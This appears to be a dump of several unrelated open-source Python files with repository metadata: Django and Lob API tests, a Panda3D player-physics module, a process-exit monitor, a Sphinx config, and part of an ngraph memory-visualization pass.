        # raise; fall back to a dummy tensor so the loader keeps running.
        try:
            self.embedding.embed(sentence)
            x = torch.Tensor([token.embedding.numpy() for token in sentence])
        except Exception:  # was a bare except, which also traps SystemExit
            x = torch.Tensor([0])
        return x, self.y_seq[index]
    def __len__(self):
        return len(self.y_seq)
| 24.179487 | 77 | 0.617179 |
10e62bea7ab8ce9590bc8826774a99fe4d538c98 | 783 | py | Python | rainyday/users/tests/test_models.py | bhanuvrat/rainy-day | 34a6b82a08f32a7e230d3434f658d6c271007993 | [
"MIT"
] | null | null | null | rainyday/users/tests/test_models.py | bhanuvrat/rainy-day | 34a6b82a08f32a7e230d3434f658d6c271007993 | [
"MIT"
] | null | null | null | rainyday/users/tests/test_models.py | bhanuvrat/rainy-day | 34a6b82a08f32a7e230d3434f658d6c271007993 | [
"MIT"
] | null | null | null | # Third Party Stuff
from django.test import TestCase
from rainyday.users.models import User
class UserModelTestCase(TestCase):
    """Unit tests for the custom ``User`` model and its manager."""
    def test_create_user(self):
        """A regular user gets sane defaults and a normalized email."""
        u = User.objects.create_user(email='f@F.com', password='abc', first_name="F", last_name='B')
        assert u.is_active is True
        assert u.is_staff is False
        assert u.is_superuser is False
        # NOTE(review): input was 'f@F.com' -- the manager apparently
        # lowercases the whole address, not only the domain part; confirm
        # against rainyday.users.models.
        assert u.email == 'f@f.com'
        assert u.get_full_name() == 'F B'
        assert u.get_short_name() == 'F'
        # __str__ returns the primary key, not the email.
        assert str(u) == str(u.id)
    def test_create_super_user(self):
        """A superuser is active with staff and superuser flags set."""
        u = User.objects.create_superuser(email='f@f.com', password='abc')
        assert u.is_active is True
        assert u.is_staff is True
        assert u.is_superuser is True
        assert str(u) == str(u.id)
| 31.32 | 100 | 0.642401 |
aa241c2df04da3f372476f761d541da12dca9327 | 648 | py | Python | tests/test_bulk_intl_verification.py | Kilo59/lob-python | 331ca698c83fab25f0e798839451e4330a79918f | [
"MIT"
] | 56 | 2015-02-05T22:35:09.000Z | 2021-12-21T01:28:48.000Z | tests/test_bulk_intl_verification.py | Kilo59/lob-python | 331ca698c83fab25f0e798839451e4330a79918f | [
"MIT"
] | 123 | 2015-01-10T00:50:55.000Z | 2022-02-23T19:52:54.000Z | tests/test_bulk_intl_verification.py | Kilo59/lob-python | 331ca698c83fab25f0e798839451e4330a79918f | [
"MIT"
] | 45 | 2015-01-30T18:55:28.000Z | 2022-01-20T00:26:32.000Z | import unittest
import os
import lob
class TestBulkIntlVerificationFunctions(unittest.TestCase):
    """Integration tests for the Lob bulk international verification API."""

    def setUp(self):
        """Authenticate the lob client from the LOB_API_KEY env variable."""
        lob.api_key = os.environ.get('LOB_API_KEY')

    def test_bulk_intl_verification(self):
        """A 'deliverable' test address verifies against Lob's fixture."""
        response = lob.BulkIntlVerification.create(
            addresses=[
                {
                    # Lob's sandbox keyword that always yields a
                    # deliverable result.
                    'primary_line': 'deliverable',
                    'country': 'CA'
                }
            ]
        )
        addresses = response.addresses
        addr = addresses[0]
        # (removed a leftover debug print of the address object)
        self.assertEqual(addr.deliverability, 'deliverable')
        self.assertEqual(addr.primary_line, '370 WATER ST')
ebb25f18d0d443f72366389f33a4a4335c0945be | 93 | py | Python | blogposts/apps.py | cesarrodas/cesars-blog | 497f4c20bab24db0c0052004e6199d669dac1fe0 | [
"MIT"
] | null | null | null | blogposts/apps.py | cesarrodas/cesars-blog | 497f4c20bab24db0c0052004e6199d669dac1fe0 | [
"MIT"
] | null | null | null | blogposts/apps.py | cesarrodas/cesars-blog | 497f4c20bab24db0c0052004e6199d669dac1fe0 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class BlogpostsConfig(AppConfig):
    """Django application configuration for the ``blogposts`` app."""
    name = 'blogposts'
| 15.5 | 33 | 0.763441 |
52370b0dea4fc7b5de0fc1b11a37c5a09eccf733 | 12,792 | py | Python | engine/player/playerPhysics.py | grimfang/rising_reloaded | 5e83b248952dd13204f14d825a45d3da8d6d725b | [
"MIT"
] | 1 | 2016-08-03T16:01:57.000Z | 2016-08-03T16:01:57.000Z | engine/player/playerPhysics.py | grimfang/rising_reloaded | 5e83b248952dd13204f14d825a45d3da8d6d725b | [
"MIT"
] | null | null | null | engine/player/playerPhysics.py | grimfang/rising_reloaded | 5e83b248952dd13204f14d825a45d3da8d6d725b | [
"MIT"
] | null | null | null | #!/usr/bin/python
#----------------------------------------------------------------------#
# The MIT License (MIT)
# See the license.txt for license information
#----------------------------------------------------------------------#
"""@ package BasePhysics
All Physics setups and builders
"""
# System Imports
import logging as log
# Panda Engine Imports
from bulletCharacterController import PandaBulletCharacterController
from panda3d.bullet import BulletGhostNode
from panda3d.bullet import BulletSphereShape
from panda3d.bullet import BulletCylinderShape
from panda3d.bullet import ZUp
from panda3d.core import Vec3, BitMask32, NodePath, Point3, TransformState
from direct.showbase.InputStateGlobal import inputState
# MeoTech Imports
#----------------------------------------------------------------------#
class PlayerPhysics():
    """Handle the player related physics.

    A collection of @classmethod helpers around the Bullet physics world:
    building the character controller/ghost, translating input into
    movement, and reacting to collision/sweep/ray queries.
    (Python 2 module -- note the statement-form ``print`` below.)
    """
    # NOTE: I wonder if these are really a good idea? doing @classmethod....
    #@ Fix the player capsule size so that it fits around the player model
    @classmethod
    def buildCharacterController(cls, _engine, _height, _radius, _pos, _head):
        """Build a basic BulletCharacter Controller.

        Returns the PandaBulletCharacterController parented under the
        engine's "player" bullet root, placed at _pos with heading _head.
        """
        np = _engine.BulletObjects["player"].attachNewNode("BCC")
        # initialise the Bullet character controller node
        char = PandaBulletCharacterController(
            _engine.bulletWorld,
            np,
            _height,
            _height * 0.35,
            0.02,
            _radius)
        # now make the character collideable with walls and ground
        char.setCollideMask(BitMask32(0x5))
        # reparent the actor to our character nodepath, so we don't
        # need to keep track of the actualisation ourselfe
        #self.character.actor.reparentTo(self.char.movementParent)
        # set the character to the start position of the actor,
        # as it will hold the startposition of the active level
        char.setPos(_pos)
        # and set the heading to those of the actor
        char.setH(_head)
        return char
    #@ Fix the size and position of the player ghost
    @classmethod
    def buildCharacterGhost(cls, _engine, _height, _radius, _bulletBody, _playerModel, _head):
        """Build a basic BulletGhost body for the player to be used for tracking eventObjects"""
        # Sphere four times the body radius so events trigger before contact.
        shape = BulletSphereShape(_radius*4)
        ghost = BulletGhostNode("player_ghost")
        ghost.addShape(shape)
        ghostNP = _engine.BulletObjects["player"].attachNewNode(ghost)
        # Lift the ghost 2.5 units above the player model's origin.
        newz = _playerModel.getPos()
        newz.z = newz.z + 2.5
        ghostNP.setPos(newz)
        # Collide with nothing; overlaps are detected via contact tests.
        ghostNP.setCollideMask(BitMask32.allOff())
        _engine.bulletWorld.attachGhost(ghost)
        ghostNP.reparentTo(_playerModel)
        return ghostNP
    @classmethod
    def doPlayerJump(cls, player, jumpHeight):
        """Allow the player to perform a jump"""
        player.startJump(jumpHeight)
    @classmethod
    def doPlayerCrouch(cls, player, startCrouching):
        """Allow the player to perform crouch.

        startCrouching: True starts the crouch, False ends it.
        """
        if startCrouching:
            player.startCrouch()
        else:
            player.stopCrouch()
    #@ useBasicPlayerMovement: needs cleaning, maybe this causes the movement bug
    #@ when you enter the grabMode
    @classmethod
    def useBasicPlayerMovement(cls, _engine, dt):
        """This sets up a basic movement for the playercontroller.

        Polls the global inputState each frame, converts it into linear
        and angular movement plus an animation request, and updates the
        Bullet character controller.
        """
        # get the player
        player = _engine.GameObjects["player"]
        speed = Vec3(0, 0, 0)
        omega = 0.0
        requestAnim = "Idle"
        # Record the last safe ground position every 10 frames while grounded.
        if not player.bulletBody.isOnGround() and player.bulletBody.movementState != "flying":
            requestAnim = "Fall"
        elif player.groundPosTestTick >= 10:
            player.lastGroundPos = player.bulletBody.getPos()
            player.groundPosTestTick = 0
        else:
            player.groundPosTestTick += 1
        if inputState.isSet('forward'): speed.setY(player.runSpeed); requestAnim="Run"
        if inputState.isSet('reverse'): speed.setY(-player.runSpeed); requestAnim="Walk"
        if inputState.isSet('left'): speed.setX(-player.runSpeed); requestAnim="Walk"
        if inputState.isSet('right'): speed.setX(player.runSpeed); requestAnim="Walk"
        if inputState.isSet('turnLeft'): omega = player.turnSpeed; requestAnim="Walk"
        if inputState.isSet('turnRight'): omega = -player.turnSpeed; requestAnim="Walk"
        if inputState.isSet('space'): PlayerPhysics.doPlayerJump(player.bulletBody, player.jumpHeight); requestAnim="Jump"
        # NOTE(review): doPlayerCrouch requires a startCrouching argument;
        # this call omits it and would raise TypeError when 'ctrl' is set --
        # confirm the intended toggle behaviour before fixing.
        if inputState.isSet('ctrl'): PlayerPhysics.doPlayerCrouch(player)
        ## In grabState
        if player.inGrabMode:
            if inputState.isSet('climb'): player.exitGrabMode()
            elif inputState.isSet('fall'): player.exitGrabMode(False)
        if not player.bulletBody.isOnGround() and player.bulletBody.movementState != "flying":
            # as we fall, set the fall animation
            if not player.actor.getAnimControl("jump").isPlaying() \
                or (player.actor.getAnimControl("jump").isPlaying()
                    and player.playingAnim == "Fall"):
                requestAnim = "Fall"
            else:
                requestAnim = "Jump"
        # Mouse steering only applies when no keyboard turn is active.
        if omega == 0:
            omega = _engine.inputHandler.getMouse(dt)
        player.bulletBody.setAngularMovement(omega)
        player.bulletBody.setLinearMovement(speed, True)
        player.bulletBody.update()
        player.requestState(player, requestAnim)
        if player.inGrabMode:
            rayHit = PlayerPhysics.doRayTest(_engine, player.bulletBody)
            if rayHit != None:
                speed.setY(0)
                player.bulletBody.movementParent.lookAt(player.bulletBody.getPos() - rayHit)
        return
    @classmethod
    def onGhostCollision(cls, _engine, _pBulletGhost, dt):
        """Checks only player ghost contacts"""
        # OverLap test for ghosts
        ghost = _pBulletGhost.node()
        ghostContactTest = _engine.bulletWorld.contactTest(_pBulletGhost.node())
        for ghostContact in ghostContactTest.getContacts():
            contactNode = ghostContact.getNode1()
            contactNodeName = contactNode.getName()
            #contactNodeStr = str(ghostContact.getNode1())
            #contactNodeList = contactNodeStr.split()
            avoidList = ["Ground_plane", "Capsule", "ItemSphere"]
            if contactNodeName in avoidList:
                # Touching the ground plane kills and respawns the player.
                if contactNodeName == "Ground_plane":
                    player = _engine.GameObjects["player"]
                    player.die()
                    player.resetPosition()
                pass
            # While player on ground dont send msg for grab
            # only when the player left the ground = jump state, only then check
            # for wall/ledges
            else:
                #print contactNode
                """Tag gets set inside blender along with the isCollisionMesh tag, the tag for the climbeable should only be added to mesh that
                are collideable, here we check for the tag, if climbeable, then check for the range if in range (which req a jump to the ledge) we attach the
                player to the ledge. (lock the movement into the axis of the mesh.) left/right"""
                # For that idea to return the contact object/wall mask
                # Get the object/level maybe this is only for the wall masks atm
                wallMask = BitMask32(0x8) #_engine.GameObjects["level"][contactNodeName].wallMask
                messenger.send("onGhostCollision", [ghostContact, contactNodeName, wallMask])
    @classmethod
    def onCollision(cls, _engine, _pBulletGhost, _pBulletBody, dt):
        """On a collision get the node and do something with it."""
        # Contact test for solids
        result = _engine.bulletWorld.contactTest(_pBulletBody.movementParent.node().getChild(0))
        for contact in result.getContacts():
            if contact.getNode1() in _engine.bulletWorld.getGhosts():
                # This works for Items only so far.
                if contact.getNode1().getNumChildren() >= 1:
                    pandaNode = str(contact.getNode1().getChild(0))
                    pandaNodeList = pandaNode.split()
                    # Find the correct Name for the item
                    renderPath = str(render.find('**/'+pandaNodeList[1]))
                    renderPathList = renderPath.split('/')
                    bulletType = renderPathList[2]
                    contactObjectName = renderPathList[4]
                    #eventType = contactObject.eventType
                    # We should check into this and make sure it doesnt spam the messenger to much
                    messenger.send("onItemCollision", [bulletType, contactObjectName])
                elif contact.getNode1():
                    ghostNode = str(contact.getNode1())
                    ghostNodeList = ghostNode.split()
                    sensorPath = str(render.find('**/'+ghostNodeList[1]))
                    sensorPathList = sensorPath.split('/')
                    if ghostNodeList[1] == 'player_ghost':
                        pass
                    elif ghostNodeList[1] in _engine.GameObjects["sensor"]:
                        #print sensorPathList
                        bulletType = sensorPathList[2]
                        contactObjectName = sensorPathList[3]
                        messenger.send("onSensorCollision", [bulletType, contactObjectName])
                    else:
                        print contact.getNode1(), "Not Setup"
                # Only the first ghost contact per frame is processed.
                break
            #># DT_EDGEGRAB ##
            elif contact.getNode1():
                #print "On WallCollision: \n"
                node = contact
                bulletNP = str(contact.getNode1())
                bulletNPList = bulletNP.split()
                nodeName = bulletNPList[2]
                # Get some math shit
                mpoint = contact.getManifoldPoint()
                #print "WALL COLLISION"
                #print "Distance: ", mpoint.getDistance()
                #print "WorldPos(A): ", mpoint.getPositionWorldOnA()
                #print "WorldPos(B): ", mpoint.getPositionWorldOnB()
                #print "LocalPoint(A): ", mpoint.getLocalPointA()
                #print "LocalPoint(B): ", mpoint.getLocalPointB()
                # if "_col" in nodeName: do #Maybe slow??
                #messenger.send("onWallCollision", [node, nodeName])
        #># DT_EDGEGRAB ##
    #@ As mentioned: Add a visual object for debugging the sweeptest movements inside the world
    @classmethod
    def doSweepTest(cls, _engine, _player, _wallMask, _extras):
        """Sweep a sphere downwards from above the player's head.

        Returns (hitPos, hitNode, hitNormal, hitFraction) for the closest
        hit that is not the player itself, or None otherwise.
        (_wallMask and _extras are currently unused -- the mask is
        hard-coded to BitMask32(0x8) below.)
        """
        print "####> doSweepTest()\n"
        #mpoint = _node.getManifoldPoint()
        playerPos = _player.bulletBody.getPos()
        tsFrom = TransformState.makePos(Point3(playerPos + (0, 0.2, _player.height + 5.0)))
        tsTo = TransformState.makePos(Point3(playerPos + (0, 0.2, 0)))
        #print "THIS IS THE PLAYER Z:", playerPos.getZ()
        rad = 1.5
        height = 4.0
        mask = BitMask32(0x8) #_wallMask
        #shape = BulletCylinderShape(rad, height, ZUp)
        penetration = 0.0
        shape = BulletSphereShape(rad)
        result = _engine.bulletWorld.sweepTestClosest(shape, tsFrom, tsTo, mask, penetration)
        #print "Sweep Node: ", result.getNode()
        #print "Sweep HitPos: ", result.getHitPos()
        #print "Sweep Normal: ", result.getHitNormal()
        #print "Sweep Fraction: ", result.getHitFraction()
        hitPos = result.getHitPos()
        hitNode = result.getNode()
        hitNormal = result.getHitNormal()
        hitFraction = result.getHitFraction()
        # Create a node to attach to
        # if flying then be able to right click to attach/grab
        avoidList = ["player_ghost", "Capsule"]
        #print "THIS IS THE FKING HIT NODE!!! : ", hitNode.getName()
        if hitNode.getName() not in avoidList:
            return hitPos, hitNode, hitNormal, hitFraction
        else:
            return None
    #@ Fix player heading Ray and Ray height sometimes it misses
    @classmethod
    def doRayTest(cls, _engine, _player):
        """Cast a ray 10 units along +Y from the player.

        Returns the hit normal of the first non-ground hit; implicitly
        returns None when nothing (or only the ground plane) is hit.
        """
        #oldTo = _node
        #oldTo.setZ(_player.getZ())
        pFrom = Point3(_player.getPos(render))
        pTo = pFrom + Vec3(0, 1, 0) * 10
        result = _engine.bulletWorld.rayTestAll(pFrom, pTo)
        for hit in result.getHits():
            hitNode = hit.getNode()
            hitNormal = hit.getHitNormal()
            if hitNode.getName() != "Ground_plane" and hitNode != None:
                #print "THIS IS THE RAY NODE: ", hitNode.getName()
                return hitNormal
            else:
                pass
| 38.763636 | 157 | 0.601235 |
ad4afcd9ed8c4d72ccee527e8dc486db2cb79111 | 1,026 | py | Python | monitor_reboot.py | initialstate/pi-process-dashboard | aa1e014ef3cb17d45c05e462f73685855490ee7f | [
"MIT"
] | 309 | 2016-12-12T18:26:18.000Z | 2022-02-11T14:19:49.000Z | monitor_reboot.py | initialstate/pi-process-dashboard | aa1e014ef3cb17d45c05e462f73685855490ee7f | [
"MIT"
] | null | null | null | monitor_reboot.py | initialstate/pi-process-dashboard | aa1e014ef3cb17d45c05e462f73685855490ee7f | [
"MIT"
] | 29 | 2016-12-16T21:53:56.000Z | 2020-09-29T07:01:44.000Z | import psutil
import time
import sys
from ISStreamer.Streamer import Streamer
# --------- User Settings ---------
# Initial State settings
# Destination bucket (name shown in the UI; key identifies it in the API).
BUCKET_NAME = ":computer: Processes"
BUCKET_KEY = "pr1208"
# Credentials/identity: fill these in before running.
ACCESS_KEY = "PLACE YOUR INITIAL STATE ACCESS KEY HERE"
PROCESS_NAME = "PLACE THE NAME OF YOUR PROCESS HERE"
# Set the time to wait until you are sure reboot is complete and network connections are restored (i.e. power outage)
MINUTES_DELAY = 5
# ---------------------------------
def main():
    """Report that the monitored process exited, once a reboot settles.

    Waits (up to ~60 s) for ntpd to appear so the system clock has been
    synced, then waits MINUTES_DELAY minutes for the network to come back
    before logging an "Exited" event to Initial State.
    """
    # Wait for ntpd to start so the clock is synced before timestamping.
    found_ntpd = False
    cnt = 0
    while not found_ntpd:
        for proc in psutil.process_iter():
            if proc.name() == "ntpd":
                found_ntpd = True
                break
        cnt += 1
        # Assume ntpd has already run if it was not seen within 60 seconds.
        if cnt == 60:
            found_ntpd = True
        time.sleep(1)
    # Give the network time to be restored (e.g. after a power outage).
    time.sleep(60 * MINUTES_DELAY)
    streamer = Streamer(bucket_name=BUCKET_NAME, bucket_key=BUCKET_KEY, access_key=ACCESS_KEY)
    streamer.log(PROCESS_NAME, "Exited")
    streamer.flush()
if __name__ == "__main__":
    main()
c0bb0024d29ba0ce2e397cc5b347b1dca067f083 | 9,097 | py | Python | docs/conf.py | transientlunatic/otter | e6be6ab454474a04c3d2c6abf8f7848079642f38 | [
"0BSD"
] | null | null | null | docs/conf.py | transientlunatic/otter | e6be6ab454474a04c3d2c6abf8f7848079642f38 | [
"0BSD"
] | null | null | null | docs/conf.py | transientlunatic/otter | e6be6ab454474a04c3d2c6abf8f7848079642f38 | [
"0BSD"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# otter documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import kentigern
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import otter
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Otter'
copyright = u'2018, Daniel Williams'
author = u"Daniel Williams"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = ".".join(otter.__version__.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = otter.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
html_theme = 'kentigern'
templates_path = ['_templates']
html_static_path = ["_static"]
else:
#sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../otter'))
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
html_sidebars = {'**': ['localtoc.html', 'sourcelink.html', 'searchbox.html']}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'otterdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'otter.tex',
u'Otter Documentation',
u'Daniel WIlliams', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'otter',
u'Otter Documentation',
[u'Daniel WIlliams'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'otter',
u'Otter Documentation',
u'Daniel WIlliams',
'otter',
'Otter is a report generation tool for Python.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 30.733108 | 78 | 0.707926 |
7d4decb4bb79a1d91bf20c2a2d836d6e3e7a0448 | 8,345 | py | Python | ngraph/transformers/passes/visualizemem.py | NervanaSystems/ngraph-python | ac032c83c7152b615a9ad129d54d350f9d6a2986 | [
"Apache-2.0"
] | 18 | 2018-03-19T04:16:49.000Z | 2021-02-08T14:44:58.000Z | ngraph/transformers/passes/visualizemem.py | rsumner31/ngraph | 5e5c9bb9f24d95aee190b914dd2d44122fc3be53 | [
"Apache-2.0"
] | 2 | 2019-04-16T06:41:49.000Z | 2019-05-06T14:08:13.000Z | ngraph/transformers/passes/visualizemem.py | rsumner31/ngraph | 5e5c9bb9f24d95aee190b914dd2d44122fc3be53 | [
"Apache-2.0"
] | 11 | 2018-06-16T15:59:08.000Z | 2021-03-06T00:45:30.000Z | # ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
from __future__ import division
from ngraph.transformers.passes.passes import GraphPass
class VisualizeMemPass(GraphPass):
    """Graph pass that writes a self-contained HTML report visualizing the
    memory behaviour of a computation.

    The report contains:
      * a summary table of persistent / temporary / max-temporary footprints,
      * a per-tensor table (size, lifetime in ops, generator-op weight),
      * an SVG histogram of live memory at each op in execution order.
    """

    def __init__(self, filename='mem.html'):
        # Destination of the HTML report written by do_pass().
        self.filename = filename

    def do_pass(self, computation_decl, **kwargs):
        """Write the memory-visualization report for *computation_decl*."""
        self.computation_decl = computation_decl
        # Opening with mode 'w' already truncates, so the previous explicit
        # file.truncate() call was redundant and has been dropped.
        with open(self.filename, 'w') as file:
            file.write('<!DOCTYPE html>\n<html>\n')
            file.write('<head>\n')
            file.write(' <style>\n')
            file.write(' th, td {\n')
            file.write(' border-bottom: 1px solid #ddd;\n')
            file.write(' width: 200px;\n')
            file.write(' }\n')
            file.write(' table, td, th {\n')
            # file.write(' border: 1px solid #ddd;\n')
            # file.write(' text-align: left;\n')
            file.write(' }\n')
            file.write(' table {\n')
            file.write(' border-collapse: collapse;\n')
            # file.write(' width: 100%;\n')
            file.write(' }\n')
            # file.write(' tr:hover {background-color: #f5f5f5}\n')
            file.write(' tr:nth-child(even) {background-color: #f2f2f2}\n')
            file.write(' </style>\n')
            file.write('</head>\n')
            file.write('<body>\n')

            # Sum the sizes of every non-persistent tensor that is ever live:
            # an upper bound on temporary memory if nothing were reused.
            tensors = set()
            temp_max_size = 0
            for node in computation_decl.exop_block:
                tensors |= set(node.liveness_live_list)
            for tensor in tensors:
                if tensor.is_persistent is False:
                    temp_max_size += tensor.size

            file.write('<table>\n')
            file.write(
                '<tr><td>Persistent Memory Footprint</td><td align="right">{:,}</td></tr>\n'
                .format(computation_decl.exop_block.persistent_size()))
            file.write(
                '<tr><td>Temporary Memory Footprint</td><td align="right">{:,}</td></tr>\n'
                .format(computation_decl.exop_block.memory_footprint()))
            file.write(
                '<tr><td>Max temporary Memory Footprint</td><td align="right">{:,}</td></tr>\n'
                .format(temp_max_size))
            file.write('</table>\n')
            file.write('<hr>\n')
            self.draw_tensor_weight(file)
            # file.write('<hr>\n')
            # self.draw_op_influence(file)
            file.write('<hr>\n')
            self.draw_histogram(file)
            # file.write('<hr>\n')
            file.write('</body>\n</html>\n')

    def find_largest_op(self):
        """Return the exop whose live tensors total the most bytes, or
        ``None`` when the exop block is empty."""
        largest_op = None
        largest_size = 0
        for i, exop in enumerate(self.computation_decl.exop_block):
            size = 0
            for tensor in exop.liveness_live_list:
                size += tensor.size
            if size > largest_size:
                largest_size = size
                largest_op = exop
        return largest_op

    def draw_tensor_weight(self, file):
        """Write a table of every freed tensor: size, age (ops between
        allocation and release) and the weight of its generator op.
        Tensors live at the single most memory-hungry op are highlighted."""
        largest_op = self.find_largest_op()
        if largest_op is not None:
            largest_live = set()
            for tensor in largest_op.liveness_live_list:
                largest_live.add(tensor)

            age_list = dict()
            tensor_set = set()
            generator_op = dict()
            file.write('<table>\n')
            file.write(' <tr>')
            file.write('<th align="left">tensor</th>')
            file.write('<th align="right">size</th>')
            file.write('<th align="right">age</th>')
            file.write('<th align="right">generator weight</th>')
            file.write('</tr>\n')
            # Pass 1: record each tensor's birth index, then overwrite it
            # with the age (free index minus birth index) when it is freed.
            for i, exop in enumerate(self.computation_decl.exop_block):
                for tensor in exop.liveness_new_list:
                    age_list[tensor] = i
                    generator_op[tensor] = exop
                for tensor in exop.liveness_free_list:
                    start = age_list[tensor]
                    age_list[tensor] = (i - start)
                    tensor_set.add(tensor)
            # Pass 2: emit rows, largest tensors first.
            for tensor in sorted(list(tensor_set), reverse=True, key=lambda tensor: tensor.size):
                generator_weight = self.compute_op_weight(generator_op[tensor])
                if tensor in largest_live:
                    file.write(' <tr style="background-color: #f0c0f0">')
                else:
                    file.write(' <tr>')
                file.write('<td>{}</td>'.format(tensor.tensor_description_base.name))
                file.write('<td align="right">{:,}</td>'.format(tensor.size))
                file.write('<td align="right">{}</td>'.format(age_list[tensor]))
                file.write('<td align="right">{}</td>'.format(generator_weight))
                file.write('</tr>\n')
            file.write('</table>\n')

    def draw_histogram(self, file):
        """Write an SVG chart with one row per op: a green bar for memory in
        use and a red extension up to the op's footprint, both scaled to the
        block-wide peak footprint."""
        stroke_width = 14
        text_offset = 4
        offset = 200
        width = 1000
        scale = width - offset
        line_spacing = stroke_width * 1.5
        line_count = 0
